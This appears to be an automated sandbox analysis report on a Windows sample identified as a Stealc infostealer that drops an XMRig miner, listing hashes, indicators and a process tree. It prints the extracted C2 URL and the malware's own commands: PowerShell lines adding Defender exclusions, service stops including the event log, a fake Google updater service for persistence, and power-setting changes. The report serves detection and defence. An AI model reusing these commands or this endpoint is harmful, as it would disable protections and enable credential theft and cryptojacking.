Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 10:36
Static task
static1
Behavioral task
behavioral1
Sample
f33c7b978d078a797f2ee0d6d0783682.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
f33c7b978d078a797f2ee0d6d0783682.exe
Resource
win10v2004-20241007-en
General
-
Target
f33c7b978d078a797f2ee0d6d0783682.exe
-
Size
382KB
-
MD5
f33c7b978d078a797f2ee0d6d0783682
-
SHA1
83efd5987a1874bc00cbab51bbcbe00dba1f1b39
-
SHA256
68137be68173e0258cabb670f93c1ce81669acd367119e268568d5781496ca61
-
SHA512
bcf4808d5d4af377b3e90e0ea09383465d26d99a354e87edcfe8967c712f1f98236e1789b14f5a3d64c77c69084587364dd7bc6b085833d29ab1ccd44f2e3fb1
-
SSDEEP
3072:VUVF4fI95c1wYBcG9N8c8lk+J76sw30WF2ozwPAPnJOVGXagKW1ZJOTxx5P/u5ls:VqKwYBfnw5WFd9PEoZe/o7A4XXJ
Malware Config
Extracted
stealc
LogsDiller
http://185.201.252.118
-
url_path
/ef952bc0f542da4b.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
CGDGHCBGDH.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CGDGHCBGDH.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 18 IoCs
Processes:
resource yara_rule behavioral2/memory/1120-160-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-161-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-174-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-173-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-172-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-171-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-165-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-163-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-162-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-159-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-175-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-167-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-164-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-158-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-176-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-178-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-179-0x0000000140000000-0x000000014082C000-memory.dmp xmrig behavioral2/memory/1120-180-0x0000000140000000-0x000000014082C000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 5108 powershell.exe 988 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
CGDGHCBGDH.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts CGDGHCBGDH.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
CGDGHCBGDH.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CGDGHCBGDH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CGDGHCBGDH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
f33c7b978d078a797f2ee0d6d0783682.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation f33c7b978d078a797f2ee0d6d0783682.exe -
Executes dropped EXE 2 IoCs
Processes:
CGDGHCBGDH.exeupdater.exepid process 3432 CGDGHCBGDH.exe 1432 updater.exe -
Loads dropped DLL 2 IoCs
Processes:
f33c7b978d078a797f2ee0d6d0783682.exepid process 3972 f33c7b978d078a797f2ee0d6d0783682.exe 3972 f33c7b978d078a797f2ee0d6d0783682.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\ProgramData\CGDGHCBGDH.exe themida behavioral2/memory/3432-84-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/3432-83-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/3432-87-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/3432-88-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/3432-91-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/3432-111-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp themida behavioral2/memory/1432-114-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp themida behavioral2/memory/1432-115-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp themida behavioral2/memory/1432-116-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp themida behavioral2/memory/1432-117-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp themida behavioral2/memory/1432-170-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
CGDGHCBGDH.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CGDGHCBGDH.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4992 powercfg.exe 3308 powercfg.exe 2020 powercfg.exe 608 powercfg.exe 992 powercfg.exe 3924 powercfg.exe 5108 powercfg.exe 2236 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
updater.exeCGDGHCBGDH.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\MRT.exe CGDGHCBGDH.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
CGDGHCBGDH.exeupdater.exepid process 3432 CGDGHCBGDH.exe 1432 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1432 set thread context of 4236 1432 updater.exe conhost.exe PID 1432 set thread context of 1120 1432 updater.exe explorer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2892 sc.exe 2612 sc.exe 4540 sc.exe 4052 sc.exe 4824 sc.exe 3864 sc.exe 2548 sc.exe 4860 sc.exe 1088 sc.exe 2128 sc.exe 3920 sc.exe 4600 sc.exe 2220 sc.exe 2268 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 384 3972 WerFault.exe f33c7b978d078a797f2ee0d6d0783682.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
f33c7b978d078a797f2ee0d6d0783682.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f33c7b978d078a797f2ee0d6d0783682.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
f33c7b978d078a797f2ee0d6d0783682.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 f33c7b978d078a797f2ee0d6d0783682.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString f33c7b978d078a797f2ee0d6d0783682.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
f33c7b978d078a797f2ee0d6d0783682.exeCGDGHCBGDH.exepowershell.exeupdater.exepowershell.exeexplorer.exepid process 3972 f33c7b978d078a797f2ee0d6d0783682.exe 3972 f33c7b978d078a797f2ee0d6d0783682.exe 3972 f33c7b978d078a797f2ee0d6d0783682.exe 3972 f33c7b978d078a797f2ee0d6d0783682.exe 3432 CGDGHCBGDH.exe 5108 powershell.exe 5108 powershell.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 3432 CGDGHCBGDH.exe 1432 updater.exe 988 powershell.exe 988 powershell.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1432 updater.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe 1120 explorer.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 5108 powershell.exe Token: SeShutdownPrivilege 608 powercfg.exe Token: SeCreatePagefilePrivilege 608 powercfg.exe Token: SeShutdownPrivilege 3308 powercfg.exe Token: SeCreatePagefilePrivilege 3308 powercfg.exe Token: SeShutdownPrivilege 992 powercfg.exe Token: SeCreatePagefilePrivilege 992 powercfg.exe Token: SeShutdownPrivilege 2020 powercfg.exe Token: SeCreatePagefilePrivilege 2020 powercfg.exe Token: SeDebugPrivilege 988 powershell.exe Token: SeShutdownPrivilege 3924 powercfg.exe Token: SeCreatePagefilePrivilege 3924 powercfg.exe Token: SeShutdownPrivilege 4992 powercfg.exe Token: SeCreatePagefilePrivilege 4992 powercfg.exe Token: SeShutdownPrivilege 2236 powercfg.exe Token: SeCreatePagefilePrivilege 2236 powercfg.exe Token: SeShutdownPrivilege 5108 powercfg.exe Token: SeCreatePagefilePrivilege 5108 powercfg.exe Token: SeLockMemoryPrivilege 1120 explorer.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
f33c7b978d078a797f2ee0d6d0783682.execmd.execmd.execmd.exeupdater.exedescription pid process target process PID 3972 wrote to memory of 1660 3972 f33c7b978d078a797f2ee0d6d0783682.exe cmd.exe PID 3972 wrote to memory of 1660 3972 f33c7b978d078a797f2ee0d6d0783682.exe cmd.exe PID 3972 wrote to memory of 1660 3972 f33c7b978d078a797f2ee0d6d0783682.exe cmd.exe PID 1660 wrote to memory of 3432 1660 cmd.exe CGDGHCBGDH.exe PID 1660 wrote to memory of 3432 1660 cmd.exe CGDGHCBGDH.exe PID 756 wrote to memory of 2028 756 cmd.exe wusa.exe PID 756 wrote to memory of 2028 756 cmd.exe wusa.exe PID 4888 wrote to memory of 1828 4888 cmd.exe wusa.exe PID 4888 wrote to memory of 1828 4888 cmd.exe wusa.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 4236 1432 updater.exe conhost.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe PID 1432 wrote to memory of 1120 1432 updater.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f33c7b978d078a797f2ee0d6d0783682.exe"C:\Users\Admin\AppData\Local\Temp\f33c7b978d078a797f2ee0d6d0783682.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CGDGHCBGDH.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\ProgramData\CGDGHCBGDH.exe"C:\ProgramData\CGDGHCBGDH.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3432 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2028
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4860 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1088 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4052 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4824 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2128 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3308 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:992 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:608 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:3920 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:2220 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2892 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 28202⤵
- Program crash
PID:384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3972 -ip 39721⤵PID:3088
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1828
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3864 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2612 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4540 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2548 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2268 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3924 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5108 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4992 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4236
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.2MB
MD5c4a1368749a5ea69504c36431734c231
SHA145c70aa850d55a404f771c5dbc9f5d790c3fb1ea
SHA256b4900787a4ded9b363b551b33f927b73e52eae1edf891faacde88b17bbcab7ac
SHA51245b35dfc9e57798b073a09c72272b74c699898610a2637554cc3ae02c7637915e11e5cd085e62853f9bb468f28eea5994dd26c57b9e2e02e453ad298f6c1c7e9
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62